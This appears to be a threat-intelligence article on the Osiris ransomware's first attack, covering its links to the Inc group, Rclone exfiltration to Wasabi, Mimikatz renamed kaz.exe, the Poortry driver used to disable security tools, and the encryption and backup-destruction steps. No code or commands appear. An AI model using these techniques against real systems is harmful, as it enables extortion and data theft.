The cybersecurity landscape was jolted in late 2025 by a meticulously executed attack against a major food service franchisee in Southeast Asia, an incident that served as the global introduction to a new and highly capable ransomware family named Osiris. While its name might evoke a passing memory of a 2016 Locky variant, extensive analysis has definitively shown that this new incarnation is an entirely separate and far more advanced threat. The attack was not merely the deployment of a new encryption tool but a showcase of the refined tactics, techniques, and procedures of a mature and methodical threat actor. Although the identities of the developers behind Osiris remain shrouded in mystery, the digital breadcrumbs left behind point to a strong operational overlap with the notorious Inc ransomware group, suggesting the emergence of a formidable new player with a veteran’s playbook. This debut has raised critical questions about the evolution of established cybercrime syndicates and the continuous refinement of their attack methodologies.
A Masterclass in Covert Operations
The defining characteristic of the Osiris incident is not the novelty of its payload but the sophistication of the group wielding it. The attackers demonstrated a deep understanding of modern enterprise networks, relying heavily on “living off the land” techniques that use legitimate and dual-use tools to navigate the victim’s environment. This approach allows them to blend seamlessly with normal administrative activity, significantly delaying detection and giving them ample time to conduct thorough reconnaissance. A central theme of the campaign was the patient and systematic dismantling of the victim’s security posture, a process that unfolded over several days before any files were encrypted. This methodical compromise culminated in a Bring-Your-Own-Vulnerable-Driver (BYOVD) attack, a sophisticated technique used to disable security solutions at the kernel level. This focus on deep network infiltration and defense evasion is a clear hallmark of an experienced and disciplined adversary, likely an offshoot of an existing group or a highly skilled affiliate that has chosen to adopt a new brand.
The operational playbook used in the attack provides compelling evidence linking the operators to the Inc ransomware group. The intrusion began with a prolonged data exfiltration phase, a critical component of the double-extortion tactics favored by top-tier ransomware gangs. Several days before deploying the ransomware, the attackers used Rclone, a legitimate command-line utility for managing cloud data, to steal vast quantities of sensitive information. This stolen data was then staged in cloud storage buckets hosted by Wasabi. The specific choice of Wasabi for data exfiltration is a significant behavioral link, as this exact TTP was previously observed in attacks attributed to the Inc ransomware group in October 2025. Furthermore, for credential theft, the attackers deployed a version of the popular tool Mimikatz, executing it under the specific filename kaz.exe. This precise filename has been documented in prior Inc ransomware incidents, serving as another strong indicator of a direct crossover in personnel, tools, or both.
Deconstructing the Digital Weapon
A cornerstone of the attackers’ strategy was the calculated takedown of the victim’s defenses, a task executed with precision and technical prowess. The operators employed a malicious driver known as Poortry in a sophisticated BYOVD attack. This driver, cleverly disguised as a legitimate Malwarebytes anti-exploit driver, was loaded onto target systems. By exploiting a vulnerability within it, the attackers gained kernel-level privileges, which granted them the authority to terminate any running process, including advanced endpoint detection and response (EDR) and antivirus (AV) solutions that are typically protected from user-level interference. The use of Poortry is particularly notable because, unlike many drivers used in BYOVD attacks that are legitimate but vulnerable third-party products, Poortry appears to be a custom-developed malicious driver that its creators successfully passed through a legitimate digital signing process. This advanced defense evasion technique underscores the group’s high level of capability and resources.
The Osiris ransomware payload itself is an effective and feature-rich tool engineered for speed and devastating impact. It utilizes a robust hybrid encryption scheme, combining the efficiency of the AES-128 symmetric cipher in Counter mode with the security of Elliptic Curve Cryptography for key protection. To maximize performance and encrypt a large number of files rapidly, the malware leverages Windows Completion I/O Ports to manage asynchronous file I/O requests. This allows for highly parallelized and efficient encryption operations. The ransomware also offers its operators granular control through several command-line arguments. These options allow the attacker to target a single file or an entire directory, write a log of its activities, and even manage the shutdown and encryption of Hyper-V virtual machines. This level of control demonstrates that the payload was designed not just for destruction, but for precise and adaptable deployment within complex enterprise environments.
To ensure the victim’s system remains operational enough to facilitate a ransom payment while maximizing damage to valuable data, Osiris is configured with specific targeting and exclusion rules. It is programmed to skip the encryption of critical system files such as .exe, .dll, and .sys, as well as essential operating system folders like windows and $recycle.bin. This prevents the system from becoming unbootable. However, it does not fully spare directories like program files, suggesting a deliberate intent to corrupt installed applications and disrupt business workflows. Before and during the encryption process, Osiris actively cripples the system’s recovery capabilities. It terminates a long list of processes related to databases, productivity software, and system utilities, and it stops critical services, particularly those related to backups like the Volume Shadow Copy Service (VSS) and various Veeam services. Once encryption is complete, it executes native Windows commands to delete all volume shadow copies, eliminating the most common method for quick file restoration.
An Evolved and Formidable Threat
The emergence of the Osiris ransomware marked a significant development in the threat landscape. The analysis of its debut attack revealed that while the encryption payload was new, it was wielded by a highly skilled and experienced adversary employing a refined and ruthlessly effective methodology. The substantial overlaps in tactics, techniques, and procedures with the Inc ransomware group, particularly the use of Wasabi for data exfiltration and the specific kaz.exe filename for Mimikatz, suggested a direct link between the two operations. This connection pointed toward the evolution of an existing cybercrime entity, possibly indicating that a former affiliate or developer from the Inc ecosystem was now operating under a new banner with an upgraded toolset. The use of advanced defense evasion techniques, exemplified by the deployment of the Poortry driver in a sophisticated BYOVD attack, further underscored the formidable capabilities of these threat actors. The ultimate impact of Osiris will depend on its future proliferation, but its first appearance demonstrated that it is a potent weapon in the hands of a capable and dangerous adversary.
